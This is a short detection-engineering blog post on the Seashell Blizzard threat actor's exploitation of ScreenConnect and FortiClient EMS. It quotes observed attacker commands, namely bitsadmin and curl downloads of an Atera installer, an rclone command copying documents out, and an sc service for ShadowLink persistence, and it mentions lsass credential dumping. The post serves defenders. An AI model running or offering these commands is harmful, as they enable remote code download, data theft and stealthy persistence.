044. Seashell Blizzard Detection: That Easy?
Hello everyone! Today we'll look at another example of an Advanced Persistent Threat, and how easy in reality is to detect related malicious activity.
Microsoft Threat Intelligence have published a report on Seashell Blizzard - a high-impact threat actor that conducts global activities ranged from espionage to information operations and cyber-enabled disruptions.
Let's explore one of exploitation patterns, which involves vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788).
First, the threat actors abused bitsadmin to download Atera installer:
bitsadmin /transfer debjob /download [link_to_installer] C:\ProgramData\temporary.msi
This is a very common malicious behaviour observed even in various ransomware cases.
They also abused curl to solve the same task:
curl -o setup.msi
In both cases the adversary downloaded the agent from *atera.com domains, so you can focus on it with conjunction to bitsadmin and curl.
The threat actors leveraged EXTREMELY common credential access techniques. They used reg.exe to extract related registry data, used renamed ProcDump to dump lsass.exe, and abused Task Manager to do the same.
Also, adversaries used another very common tool often seen in ransomware gangs arsenal - rclone:
rclone.exe --config [path_to_config] copy [target_directory] --ignore-case --ignore-existing --auto-confirm --multithread-streams 20 --transfers 20 --checkers 20 --tpslimit 20 --include *.docx [redacted] --max-size 1000M
As you can see, there're many interesting command line parameters you can use in detection engineering!
The threat actors also deployed ShadowLink malware, and, again, used very common persistence mechanism:
sc create system start= auto binPath= "C:\ProgramData\System\svchost.exe -nt-service -f C:\ProgramData\System\systemrc"
So, svchost.exe in C:\ProgramData? Nice try!
See you tomorrow!
Comments
Post a Comment